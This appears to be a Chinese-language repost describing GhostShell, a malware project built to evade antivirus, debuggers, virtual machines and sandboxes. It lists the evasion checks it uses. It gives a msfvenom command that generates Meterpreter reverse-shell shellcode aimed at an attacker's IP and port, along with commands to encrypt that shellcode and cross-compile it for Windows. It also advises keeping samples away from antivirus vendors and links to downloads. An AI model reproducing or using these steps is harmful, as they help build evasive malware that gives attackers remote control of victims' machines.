目录导航
GhostShell简介
在此恶意软件中,使用了一些技巧来绕过杀毒软件,虚拟机和沙盒,而仅需一点点学习即可投入使用.
仅可用于学习研究使用,我对您的滥用行为不承担任何责任.
注意
要检查防病毒软件是否检测到该恶意软件,切勿将其发送给病毒库,它将被发送给反病毒公司并被破坏,以进行分析并将其发送给https://www.hybrid-analysis.com/并记住选中“请勿将我的样品发送给非关联第三方”选项
Bypass技术
反调试器
为了绕过调试器,我使用“Windows.h”库中的“IsDebuggerPresent()”来检查调试器是否正在运行。
防虚拟机/防沙箱/防AV
- 枚举过程函数 枚举系统上运行的所有进程,并与黑名单中的进程进行比较(如果找到了一个进程),并且该进程等于黑名单中的任何进程,则返回-1(标识)。
- 睡眠加速检查功能 首先,获取当前时间,并休眠2分钟,然后,再次获取时间,然后进行比较,如果差异小于2,则返回-1(标识为)。
- Mac地址检查功能 如果系统mac地址等于黑名单中的任何mac,则获取系统mac地址并与黑名单中的mac进行比较,返回-1(标识)。
生成Shellcode
在终端中生成shellcode类型:
msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c复制生成的shellcode并对其进行加密
要加密shellcode,请使用encrypt_shellcode脚本。
在linux上输入命令:
./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""在Windows上输入命令:
encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""如何在Linux上为Windows进行编译
#要在Linux上针对Windows进行编译,请先安装mingw-w64:
sudo apt-get install mingw-w64
#编译32位:
i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static
#编译64位:
x86_64-w64-mingw32 -o main.exe main.c -l psapi -staticGhostShell下载地址
①GitHub github.com/ReddyyZ/GhostShell
②雨苁网盘 https://w.ddosi.workers.dev/
项目地址
GitHub https://github.com/ReddyyZ/GhostShell